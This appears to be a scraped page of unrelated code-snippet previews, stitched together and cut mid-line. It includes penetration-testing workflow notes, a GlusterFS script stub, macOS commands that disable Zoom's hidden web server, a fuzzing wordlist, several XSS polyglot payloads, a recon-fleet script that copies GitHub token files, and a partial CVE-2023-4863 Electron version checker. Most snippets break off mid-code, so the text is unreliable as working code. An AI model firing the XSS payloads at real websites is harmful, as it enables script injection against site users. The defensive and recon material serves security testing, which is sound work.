- Recon
- Find vuln
- Exploit
- Document it
Unicornscans in cli, nmap in msfconsole to help store loot in database.
#!/bin/bash | |
if [[ "$#" < "2" || "$#" > "3" ]]; then | |
cat <<END | |
Glusterfs GFID resolver -- turns a GFID into a real file path | |
Usage: $0 <brick-path> <gfid> [-q] | |
<brick-path> : the path to your glusterfs brick (required) | |
If you're using macOS, run these commands:
pkill "ZoomOpener"; rm -rf ~/.zoomus; touch ~/.zoomus && chmod 000 ~/.zoomus;
pkill "RingCentralOpener"; rm -rf ~/.ringcentralopener; touch ~/.ringcentralopener && chmod 000 ~/.ringcentralopener;
These two commands do the same thing for the two most popular "brands" of Zoom (Zoom, and RingCentral). They first kill the hidden server if it is running, and then regardless deletes it from its hidden directory if it exists there. Finally they create an empty file
# coding=utf-8 | |
# python3 | |
from urllib.parse import urlparse | |
import requests | |
import urllib3 | |
from bs4 import BeautifulSoup |
. | |
.. | |
........ | |
@ | |
* | |
*.* | |
*.*.* | |
🎠|
jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'> | |
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//> | |
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//> | |
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//> | |
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>` | |
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">` | |
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script> | |
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript>< |
#!/bin/bash | |
# Use this as initial axiom's script on reconftw.cfg file to copy config files to the fleet | |
axiom-exec 'mkdir -p /home/op/.config/amass/ /home/op/Tools/ /home/op/.config/subfinder/ /home/op/.config/notify/' | |
axiom-scp ~/.config/amass/config.ini '*':/home/op/.config/amass/config.ini | |
axiom-scp ~/Tools/h8mail_config.ini '*':/home/op/Tools/h8mail_config.ini | |
axiom-scp ~/Tools/.github_tokens '*':/home/op/Tools/.github_tokens | |
axiom-scp ~/.config/notify/notify.conf '*':/home/op/.config/notify/notify.conf | |
axiom-scp ~/Tools/.github_tokens '*':/home/op/Tools/.github_tokens |
Here's how this attack works: https://www.google.com/amp/s/www.zdnet.com/google-amp/article/how-i-survived-a-sim-swap-attack-and-how-my-carrier-failed-me/
#!/usr/bin/env zsh | |
# patched versions for CVE-2023-4863: 22.3.24, 24.8.3, 25.8.1, 26.2.1 | |
mdfind "kind:app" 2>/dev/null | sort -u | while read app; | |
do | |
filename="$app/Contents/Frameworks/Electron Framework.framework/Electron Framework" | |
if [[ -f $filename ]]; then | |
echo "App Name: $(basename ${app})" | |
electronVersion=$(strings "$filename" | grep "Chrome/" | grep -i Electron | grep -v '%s' | sort -u | cut -f 3 -d '/') |